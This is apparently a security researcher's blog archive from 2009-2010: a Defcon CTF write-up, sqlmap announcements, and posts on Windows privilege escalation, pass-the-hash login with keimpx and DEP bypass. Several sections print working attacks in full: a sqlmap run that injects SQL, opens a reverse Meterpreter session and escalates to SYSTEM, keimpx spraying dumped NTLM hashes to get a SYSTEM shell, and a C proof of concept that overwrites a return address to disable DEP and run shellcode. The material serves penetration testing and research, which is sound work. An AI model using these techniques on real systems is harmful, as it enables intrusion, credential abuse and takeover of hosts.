cat key
SHis4pansies

The key is SHis4pansies.

Defcon 18 CTF quals writeup: Packet Madness 200

2010-05-25T21:21:00.011+01:00

Last week-end I played Defcon #18 Capture The Flag quals together with some friends. We made up a team of less than 10 people who worked hard, as much as we could, slept very little and had a lot of fun. We ended up in the Top 60!

I am going to post a few write-ups about the challenges that I have solved. Let's kick off with the Packet Madness 200.

Title: These folks speak a different language. Join their site and translate the key for us.

File: pkt200_55216efa7a182fb0.pcap (mirrored here).

It is a capture file of a TCP traffic between 192.41.96.121:8686 (server) and 192.41.96.15:50566 (client).

By using Wireshark's Follow TCP streams feature I spotted the traffic was Telnet-like EBCDIC encoded, but clearly visible in ASCII from the tool:

For help at any time enter: ?
.cmd : .?
a - new user
l - login
n - news
m - maintenance
q - quit
? - print this message
cmd : .a
New user id: .marsddtek
New user password: .ilovesheep
Again: .ilovesh33p
Passwords do not match.
.cmd : .a
New user id: .mars.ddtek
New user password: .ilovesh33p
Again: .ilovesh33p
Welcome .mars.ddtek, we hope you enjoy our bbs
.You may now login
.cmd : .l
User: .administrator
Password: .password
Invalid user.
.cmd : .l
User: .admin
Password: .pass
Invalid user.
.cmd : .l
User: .root
Password: .root
Invalid user.
.cmd : .m
Please log in to use maintenance mode.
.cmd : .n
Please log in to read the news.
.cmd : .l
User: .mars.ddtek
Password: .ilovesh33p
Welcome back.mars.ddtek.
.cmd : .m
Insufficient privileges.
.cmd : .l
User: .Admin
Password: .admin
Invalid user.
.cmd : .l
User: .Admin
Password: .12345
Invalid user.
.cmd : .?
a - new user
l - login
n - news
m - maintenance
q - quit
? - print this message
cmd : .q

As you can see yourself, it looks familiar to old-fashion IBM mainframes and BBS systems.

I tried to connect to the server's port and it responded, obviously EBCDIC encoded data. Then I looked for a proper Telnet client that speaks EBCDIC, but my Google dorking skills were poor during the night. I ended up coding my own crappy Python script with mere socket library and string encoding/decoding:

#!/usr/bin/env python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.41.96.121', 8686))
data = s.recv(1024)
print data.decode('EBCDIC-CP-BE').encode('ascii')
data = s.recv(1024)
print data.decode('EBCDIC-CP-BE').encode('ascii')

while True:
    command = raw_input()

    if not command or command == "?":
        question = True
    else:
        question = False

    command = "%s\n" % command
    command = command.encode('EBCDIC-CP-BE')
    s.send(command)

    data = s.recv(1024)
    data = data.decode('EBCDIC-CP-BE').encode('ascii')
    print data

    if not question and "Password" not in data and "password" not in data and "Again" not in data:
        data = s.recv(1024)
        data = data.decode('EBCDIC-CP-BE').encode('ascii')
        print data

s.close()

The code looks ugly, but it worked pretty well. I launched it and interacted with the server:

$ python pkt200_55216efa7a182fb0.py
For help at any time enter: ?

cmd :
?
a - new user
l - login
n - news
m - maintenance
q - quit
? - print this message

a
cmd :

New user id:
lulzteam
New user password:
lulz
Again:
lulz
Welcome

lulzteam, we hope you enjoy our bbs
You may now login

n
cmd :

Please log in to read the news.

m
cmd :

Please log in to use maintenance mode.

cmd :
l
User:
lulzteam
Password:
lulz
Welcome back

cmd :
m
Insufficient privileges.

cmd :
n
Welcome to our news bulletin board

5/21/2010 - Defcon qualifiers are underway.

5/18/2010 - It's Bob Randolph's birthday today, wish him well
if you see him

5/16/2010 - It's IBM old timer's night at the bowling alley.
The key thing to remember at these things is that:
once upon a time IBM ruled the world

4/29/2001 - First post! w00t!

The key is once upon a time IBM ruled the world.

sqlmap 0.8 released

2010-03-15T10:05:00.009+00:00

It has been a while since I released the previous stable version of sqlmap. Now sqlmap 0.8 stable is out!

Some of the new features include:

Support to enumerate and dump all databases' tables containing user provided column(s) by specifying for instance --dump -C user,pass. Useful to identify for instance tables containing custom application credentials.
Support to parse -C (column name(s)) when fetching columns of a table with --columns: it will enumerate only columns like the provided one(s) within the specified table.
Support for takeover features on PostgreSQL 8.4.
Enhanced --priv-esc to rely on new Metasploit Meterpreter's getsystem command to elevate privileges of the user running the back-end DBMS instance to SYSTEM on Windows.
Automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP, but there is a writable folder within the web server document root.
Added support for regular expression based scope when parsing Burp or Web Scarab proxy log file (-l), --scope.
Major bug fix and enhancements to the multi-threading (--threads) functionality.

Complete list of changes at
https://svn.sqlmap.org/sqlmap/trunk/sqlmap/doc/ChangeLog.

Also, I am looking for security geeks who can write some "clean" Python code, know about web application security, database takeover, post-exploitation techniques, software refactoring and are motivated to join the development team. If you are interested, please get back to me. If you have no clue what the tool is about, are excited about joining the effort, but has never written a single line of code or you want only to appear in the AUTHORS file, please don't waste my and your time.

For the sceptical.. No, it's not only about web application. Yes, it helps you also to get a command prompt on the target system. Yes, it can be used to privilege escalate to SYSTEM if the target system is Windows.

Not yet convinced that this tool is worth a try? Get some popcorns, head to http://sqlmap.sourceforge.net/demo.html and watch some video demonstrations.

Here it is an incentive for you..

Privilege escalation on Windows hotness

2010-01-29T22:04:00.023+00:00

There are several techniques to elevate your privileges on Windows to Administrator user or SYSTEM like abusing Windows Impersonation Tokens (fixed by MS09-012), abusing LSASS via token passing (Pass-the-Hash Toolkit) which requires you to have already Administrator privilege anyway, exploiting weak permissions (read and write) in the services (most of them by default run as SYSTEM, if you are lucky they run as a domain administrator), etc.

For a couple of weeks now it has become even more easy and user-friendly: KiTrap0D exploit released by Tavis Ormandy and, at the time of writing this post, still unpatched by Microsoft.

For the Metasploit fans, HD Moore and Pusscat committed in the last week on the Framework subversion repository an enhanced version of the KiTrap0D exploit (which works also on Windows Server 2003 SP2 fully patched) and the Meterpreter's kitrap0d script to launch it. Stephen Fewer on his side committed in the last days a major enhancement to the Meterpreter extensions: getsystem command is available and implements, as of today, four different techniques to elevate privileges to SYSTEM on a Windows target system either if your Meterpreter session is running as Administrator or as a really unprivileged user. The last technique implemented is, again, kitrap0d so you have no excuses to be able to elevate your privileges once you have established a Meterpreter session.

On my side, I have adapted sqlmap to rely on getsystem brand new Meterpreter command to elevate privileges of the user running the back-end database management system service (for instance Network Service for Microsoft SQL Server) to SYSTEM.

Follows an example of sqlmap against a PostgreSQL 8.4 (latest stable release) instance running on Windows 2003 Service Pack 2 fully patched. For your knowledge, PostgreSQL on Windows runs as a low privileged user, postgres.


$ ifconfig vmnet8
vmnet8    Link encap:Ethernet  HWaddr 00:50:56:c0:00:08
       inet addr:172.16.213.1  Bcast:172.16.213.255  Mask:255.255.255.0
[...]
$ svn info
Path: .
URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
Repository Root: https://svn.sqlmap.org/sqlmap
Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
Revision: 1181
Node Kind: directory
Schedule: normal
Last Changed Author: inquisb
Last Changed Rev: 1181
Last Changed Date: 2010-01-29 22:58:12 +0000 (Fri, 29 Jan 2010)
$ python sqlmap.py -u "http://172.16.213.128/sqlmap/pgsql/iis/get_int_84
.aspx?id=1" -v 1 --os-pwn --msf-path ~/software/metasploit --priv-esc

sqlmap/0.8-rc6
by Bernardo Damele A. G. 

[*] starting at: 22:43:56

[...]
[22:44:08] [INFO] testing PostgreSQL
[22:44:09] [INFO] confirming PostgreSQL
[22:44:09] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: PostgreSQL
[...]
how do you want to execute the Metasploit shellcode on the back-end database
underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[22:44:28] [INFO] creating Metasploit Framework 3 multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine,
on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [172.16.213.1]
which local port number do you want to use? [21188]
[22:44:34] [INFO] forcing Metasploit payload to Meterpreter because it is
the only payload that can be used to escalate privileges, either via
'getsystem' command
[22:44:34] [INFO] creation in progress .... done
[22:44:38] [INFO] running Metasploit Framework 3 command line interface
locally, wait..
[*] Please wait while we load the module tree...
[*] Started reverse handler on port 21188
[*] Starting the payload handler...
[22:44:44] [INFO] running Metasploit Framework 3 shellcode remotely via UDF
'sys_bineval', wait..
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (172.16.213.1:21188 -> 172.16.213.128:1869)

meterpreter >
[22:44:47] [INFO] trying to escalate privileges using Meterpreter
'getsystem' command which tries different techniques, including kitrap0d
[22:44:47] [INFO] displaying the list of Access Tokens availables. Choose
which user you want to impersonate by using incognito's command
'impersonate_token' if 'getsystem' did not success to elevate
privileges
Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > Loading extension priv...success.
meterpreter > Loading extension sniffer...success.
meterpreter > Computer: W2K3DEV
OS      : Windows .NET Server (Build 3790, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > Server username: W2K3DEV\postgres
meterpreter > ...got system (via technique 4).
meterpreter >
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
W2K3DEV\Administrator
W2K3DEV\postgres

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
W2K3DEV\IUSR_W2K3STENSP0

meterpreter > Server username: NT AUTHORITY\SYSTEM

As you can see from this example, sqlmap detected and exploited the SQL injection in the web application, fingerprinted the back-end DBMS as PostgreSQL running on Windows then, because the --os-pwn option has been provided, asked the user how to execute the Metasploit shellcode on the back-end DBMS (by default in-memory via sqlmap's own sys_bineval() user-defined function previously injected, anti-forensics technique, see these slides for details), then asked the user options related to the creation of the shellcode (or of the payload stager when the user chooses to forge it as a standalone executable and execute it on the target system, less stealthy way).

Because option --priv-esc has been provided too, the Metasploit payload is forced to Meterpreter and sqlmap automatically loads all its extensions, including priv, once the out-of-band session is established. Now it shows the user running the PostgreSQL server instance (Meterpreter getuid command) and elevate the process privileges to SYSTEM (Meterpreter getsystem command).

Enjoy the beauty of KiTrap0D as long as it is not fixed!

MySQL support in Metasploit

2009-12-29T13:30:00.009+00:00

A few days ago HD Moore commited onto Metasploit subversion repository the initial support for MySQL that I have put together some weeks ago. From his post on Metasploit blog:

"This was a multi-pronged effort led by Bernardo Damele A. G, combined with TOMITA Masahiro's pure Ruby MySQL driver, tweaked by myself, and concisely documented by Carlos Perez. We will continue to improve MySQL exploitation support by borrowing some of the other techniques that Bernardo implemented in SQLMap (UDFs, upload, download)"

The idea is to integrate some of sqlmap recent enhancements to the Metasploit Framework: the operating system takeover features of sqlmap will be available to the Framework users. This includes execution of custom queries, file system access (file download and upload), database user privilege escalation, operating system command execution via user-defined function injection, execution of Metasploit payloads in-memory, an extra brute-forcer of database users' credentials and more.

This can be handy while performing a build review or an infrastructure assessment against a database server where you have been provided with a valid database user credentials or have been able to brute-force them. Either way you get access to the database, you can exploit databases' design weaknesses (also known as features), excessive user privileges or database security vulnerabilities (see MS09-004) to get control of the underlying file system, operating system and network perimeter.

I will keep on developing sqlmap to exploit SQL injection flaws in web applications and Metasploit modules to connect directly to the database and perform the same attack vectors of sqlmap, using valid database credentials as a stepping stone rather than a SQL injection vulnerability.

In a sentence, you will have no more excuses to successfully exploit databases now, independently how you have got access to them ;)

Stay tuned!

sqlmap state of art - 3 years later

2009-12-15T14:24:00.004+00:00

A few months ago sqlmap has passed its 3rd year of virtual life. I would like to personally thank Daniele Bellucci for starting the project back in July 2006 and letting me to succeed him in sqlmap development since September 2006.

During the last 12 months, sqlmap has seen a lot of improvements in (post-)exploitation functionalities[1][2][3] ranging from underlying file system read and write access to database buffer overflow exploitation with memory protection bypass passing by UDF injection to execute Metasploit payload in-memory or via payload stager executable and more[4] (thanks to Guido Landi for helping me out with some of these features).

I've received tons of great feedback (dumb questions too) privately by email, face to face and via this mailing list from you all and I really appreciate it, thank you[5]!
Sorry if I did not get back right away, I might have missed your email: send it again privately and I will try to get back promptly.

The media/blogger attention to the tool and SQL injection as a vector not only to expose sensible data but also to own the whole underlying system and internal network in general has been higher in the last 12 months. Personally speaking, since my talk at Black Hat Europe[6][7][8] and the recent Corporate websites ownage[9].

Surprisingly sqlmap is the most downloaded SQL injection tool on SourceForge[10], however I've no statistics about the downloads from third-party mirrors so this information does *not* count globally.
Also, a search on Google for "sql injection"[11] places sqlmap at the 21st place, first tool of its category to be mentioned: good to see that many whitepapers and tutorials showed up first, symptom maybe that many people do care about learning how it works before just firing up a tool.

Now I see sqlmap development for 2010 going in two directions:

I would like to brainstorm with *you* then rewrite from scratch the detection engine, it's the weak part of sqlmap in my opinion, it upsets many users, requires reading and understanding of the user's manual for not-straightforward SQL injections and, sadly, is not as mature as some other tools (very few though[12] ;)). I've some thoughts about it and will share them soon. Please, do reply to this point if you've anything to say either publicly or privately, feel free to get in touch also via Jabber if you prefer. All comments, suggestions and critics will be answered, taken into account and eventually summarized afterwards in an email open to the mailing list.
It would be great that someone joins actively the development team (me, sigh..) to maintain the code, refactor it a bit, document it to ease new developers to code over it, fix bugs and add new features. I've a list of about 60 unique items in the ticketing system, so there's plenty of work to do, time permitting.

Yes, you've got it right, I am looking for help as in code: software engineers experienced in Python development (no, I won't follow the Ruby hype so please don't ask for a change of technology) so if you ever thought it would be cool to join sqlmap development now it's your time to do so. I can provide you with write access to a personal branch on the sqlmap subversion repository, access to the project management interface (this include ticketing system) and if you show up in London area we can meet for a beer too or, if you prefer, a more typical English tea! ;)

I hope this will bring a lot of good ideas and I am open to read all your thoughts. Thanks if you spent your time to the end of this post.

Text cross-posted on sqlmap-users mailing list.

keimpx in action

2009-12-11T11:26:00.010+00:00

Few weeks ago I released a new tool called keimpx.
It basically takes in a single pair of credentials or a list of credentials (plain-text passwords or as NTLM hashes outputted by Pass-The-Hash Toolkit, fgdump, PWDumpX and similar tools), a single host or a list of hosts. It will then try off combinations of the user credentials and hosts to see where they work.

It comes handy when you are in front of a large Windows network, have owned one of the workstations (or a server) and you want to check on which other systems you can login with the dumped hashes or cracked plain-text passwords.

As far as I know, there exist publicly three similar tools:

PsExec can be used to login via a single pair of user/password to a remote machine over SMB and execute commands. Single executable file, it works on any Windows system. It does not offer the ability to login by providing NTLM hashes.
smbshell is a pre-compiled NASL script and it requires the nasl interpreter and a bunch of other Nessus libraries to run, not very convenient. Nevertheless, an advantage over PsExec is that it accepts also the NTLM hash of the password. Like PsExec, it can be used to login onto one system at a time.
Metasploit's psexec auxiliary module can be used to login via a single pair of user/password or user/NTLM hash to a remote machine over SMB and execute commands. It is an enhanced version of the original standalone PsExec, but it requires to have direct access between the attacker machine and the target network (you could always pivot traffic through the owned Windows system via a Meterpreter session route option though) which is not always feasible, for instance, in a Citrix break-out where the back-end system is masked by a Citrix MetaFrame web interface. Like PsExec and smbshell, it can be used to login onto one system at a time.

keimpx can be used to login over SMB onto a single target (like previous tools) or a list of targets by providing either a pair of user/password (like previous tools), a pair of user/NTLM hash (like smbshell and Metasploit's psexec), a list with the dumped hashes and eventually the cracked passwords. If valid credentials are detected on any of the targets, it can be used to enumerate shares, users, domains, password policy, execute commands and access the Windows registry (soon). The advantage over smbshell and Metasploit's psexec module is that it is a single Python script that requires the Python interpreter only to work, moreover the tool can be converted into a single executable file, then uploaded to the owned Windows system and run from there from command line, like PsExec. The other advantage over all the other tools is that it can primarily be used to check for the usefulness of a list of credentials, as in pairs of user/password, user/NTLM hash and user/NTLM session token, across the whole Windows network.

Usage help:

$ python keimpx.py -h
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

    keimpx 0.2-dev
    by Bernardo Damele A. G. 
   
Usage: keimpx.py [options]

Options:
  --version       show program's version number and exit
  -h, --help      show this help message and exit
  -v VERBOSE      Verbosity level: 0-2 (default 0)
  -t TARGET       Target address
  -l LIST         File with list of targets
  -U USER         User
  -P PASSWORD     Password
  --nt=NTHASH     NT hash
  --lm=LMHASH     LM hash
  -c CREDSFILE    File with list of credentials
  -D DOMAIN       Domain
  -d DOMAINSFILE  File with list of domains
  -p PORT         SMB port: 139 or 445 (default 445)
  -n NAME         Local hostname
  -T THREADS      Maximum simultaneous connections (default 10)
  -b              Batch mode: do not ask to get an interactive SMB shell

Follows an example:

$ cat /tmp/hashes_and_plain
# Lines output of fgdump
Administrator:500:0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210:::
ASPNET:1003:F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
# Cracked plain-text password
testuser testpass

$ python keimpx.py -t 172.16.77.130 -c /tmp/hashes_and_plain -v 1
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

    keimpx 0.2-dev
    by Bernardo Damele A. G. 
   
[15:53:23] [INFO] Loading targets
[15:53:23] [INFO] Loading credentials
[15:53:23] [INFO] Loading domains
[15:53:23] [INFO] Loaded 1 unique targets
[15:53:23] [INFO] Loaded 4 unique credentials
[15:53:23] [INFO] No domains specified, using NULL domain
[15:53:23] [INFO] Attacking host 172.16.77.130:445
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
[15:53:23] [INFO] Wrong credentials on 172.16.77.130:445: Guest/BLANK (2239)
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: testuser/testpass
[15:53:23] [INFO] Attack on host 172.16.77.130:445 finished

The credentials worked in total 3 times

TARGET SORTED RESULTS:

172.16.77.130:445
  Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
  ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
  testuser/testpass


USER SORTED RESULTS:

Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
  172.16.77.130:445

ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
  172.16.77.130:445

testuser/testpass
  172.16.77.130:445

Do you want to get a shell from any of the targets? [Y/n] y
Which target do you want to connect to?
[1] 172.16.77.130:445
> 1
Which credentials do you want to use to connect?
[1] Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
[2] ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
[3] testuser/testpass
> 1
[15:53:46] [INFO] type 'help' for help menu
# shell
[16:53:07] [INFO] Uploading the service executable to 'ADMIN$\ihtell.exe'
[16:53:07] [INFO] Connecting to the SVCCTL named pipe
[16:53:07] [INFO] Creating the service 'uYRYKB'
[16:53:07] [INFO] Starting the service 'uYRYKB'
[16:53:07] [INFO] Connecting to backdoor on port 2090, wait..
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection 3:

   Connection-specific DNS Suffix  . : localdomain
   IP Address. . . . . . . . . . . . : 172.16.77.130
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.77.2

C:\WINDOWS\system32>exit
exit
[16:53:20] [INFO] Connecting to the SVCCTL named pipe
[16:53:20] [INFO] Stopping the service 'uYRYKB'
[16:53:20] [INFO] Deleting the service 'uYRYKB'
[16:53:20] [INFO] Removing the service executable 'ADMIN$\ihtell.exe'
# exit

As you can see from the example, keimpx checked for usefulness of credentials of four different users on a single target address, identified that three of them are valid then asked to initiate a SMB shell, on which target, with which valid credentials then I provided the shell command (you can see the list of implemented commands via help or with TAB completion) to spawn an interactive command prompt.

I hope you find it useful during your large Windows infrastructure assessment!

DEP bypass with SetProcessDEPPolicy()

2009-12-09T17:17:00.035+00:00

Data Execution Prevention (DEP) was introduced in Windows XP SP2 and is included in Windows XP Tablet PC Edition 2005, Windows Server 2003 Service Pack 1 and later, Windows Vista Service Pack 0 and later, and Windows Server 2008 Service Pack 0 and later, and all newer versions of Windows.

Hardware-enforced DEP, for CPUs that support NX (AMD) or XD (Intel) bits, enforces non-executable pages, basically it marks the stack/part of the stack as non-executable, thus preventing the execution of arbitrary shellcode residing on the stack. When the processor/system has NX/XD support/enabled, then Windows DEP is hardware DEP.

Compilers such as Visual Studio C++ offer a link flag (/NXCOMPAT) that will enable applications for DEP protection. It's enabled by default since it was introduced in Visual Studio 2005.

DEP can be circumvented in a number of ways by an attacker while exploiting a buffer overflow vulnerability to successfully achieve arbitrary command execution or, generally speaking, "successful shellcode run" when it resides on the stack. Some of these techniques are:

Return-to-libc with a call to WinExec() widely covered in many papers and slides.
ZwProtectVirtualMemory researched and explained on John's blog.
NtSetInformationProcess initially researched by skape and Skywing and explained in an Uninformed article titled Bypassing Windows Hardware-enforced Data Execution Prevention. This is the widely known and used technique in most of publicly available exploits that bypass hardware-enforced DEP.
SetProcessDEPPolicy, discussed in this blog post.

SetProcessDEPPolicy() API has been "silently" added to Windows Vista SP1, Windows XP SP3 and Windows Server 2008.

Michael Howard wrote a post on his blog back in early 2009 on how to use this function to set DEP for the current process from a developer perspective; I found it fairly well documented on MSDN too. It has also been mentioned back in summer 2008 by Alexander Sotirov and Mark Dowd in their Black Hat USA presentation titled Bypassing Browser Memory Protections.
Apart from these references, I did not find on the Internet any proof of concept demonstrating in practice how to abuse this API while exploiting a buffer overflow vulnerability to bypass hardware-enforced DEP so I wrote the following proof of concept and hope it might be of help to other people too. In my opinion this technique is the simplest among the ones I have mentioned: it does not require any stack or registers alignment to be in place before the function is called. The only drawback is that it is not supported on Windows 2003

My test environment is a Windows XP Professional SP3 English updated on December 9, 2009 with DEP manually set to OptOut so enabled for all processes except the ones that are put in the exception list and the following proof of concept is not.

DEP manually set to OptOut on Windows XP with no exceptions

The source code has been compiled with Microsoft Visual C++ 2008 Express Edition in Release mode with the default flags. This includes /NXCOMPAT and /GS flags.
Buffer Security Check (stack cookie, /GS flag) does not need to be bypassed in this specific case because the string buffer that we are going to overflow, buf, is long 4 bytes, so the compiler does not add the stack cookie to the useSetProcessDEPPolicy() function for performance reasons. Remember that strict_gs_check pragma by default is turned off.

The following screenshot of Immunity Debugger shows that the shellcode (INT 3 instruction only in this PoC) has been successfully executed after DEP has been disabled abusing SetProcessDEPPolicy().

If DEP was not disabled, an Access Memory Violation would have been raised and the process would have been terminated.

Follows the proof of concept:

/*
This is a proof of concept of buffer overflow exploitation with DEP
bypass on Windows XP Professional SP3 english updated on December 9,
2009 with DEP manually set to OptOut so enabled for all processes,
except the ones that are put in the exception list and this program
is not.

This source has been compiled with Microsoft Visual C++ 2008 Express
Edition in Release mode with the default flags. This includes
/NXCOMPAT and /GS.

Buffer Security Check (stack cookie, /GS flag) does not need to be
bypassed because the string buffer, buf, in this example is long
4 bytes, so the compiler does not add the GS cookie to the
useSetProcessDEPPolicy() function. Remember that strict_gs_check
pragma by default is turned off.

References:
* 'New NX APIs added to Windows Vista SP1, Windows XP SP3 and Windows
 Server 2008' by Michael Howard,
 http://blogs.msdn.com/michael_howard/archive/2008/01/29/new-nx-apis-added-to-windows-vista-sp1-windows-xp-sp3-and-windows-server-2008.aspx
* SetProcessDEPPolicy Function,
 http://msdn.microsoft.com/en-us/library/bb736299%28VS.85%29.aspx

Feel free to write me for comments and questions,
Bernardo Damele A. G. <bernardo.damele@gmail.com>
*/


#include <windows.h>
#include <stdlib.h>


void useSetProcessDEPPolicy()
{
   char buf[4];

   /* Overflow the string buffer and EBP register. */
   strcpy(buf, "AAAABBBB");

   /* SetProcessDEPPolicy() API has been added to Windows Vista SP1,
   Windows XP SP3 and Windows Server 2008 and can be abused by an
   attacker while exploiting a buffer overflow vulnerability to disable
   hardware-enforced DEP (NX/XD bit) for the running process.

   Overwrite EIP with the address of SetProcessDepPolicy() API, which
   is 0x7c8622a4 on a Windows XP SP3 English 32bit system updated on
   December 9, 2009.

   NOTE: You might need to adapt it depending on your system patch
   level. */
   memcpy(buf+8, "\xa4\x22\x86\x7c", 4);

   /* Return address of SetProcessDepPolicy().
   Use an address of a JMP ESP instruction in kernel32.dll to jump to our
   shellcode on the top of the stack.

   NOTE: You might need to adapt it depending on your system patch
   level. */
   memcpy(buf+12, "\x13\x44\x87\x7c", 4);

   /* Argument for SetProcessDepPolicy().
   0x00000000 turn off DEP for this process. */
   memcpy(buf+16, "\x00\x00\x00\x00", 4);

   /* The shellcode to be executed after DEP has been disabled.
   For instance, a breakpoint (INT 3 instruction) to call the
   debug exception handler which will pause the process. */
   memcpy(buf+20, "\xcc", 1);
}


int main()
{
   useSetProcessDEPPolicy();

   return 0;
}

This source code can also be found here.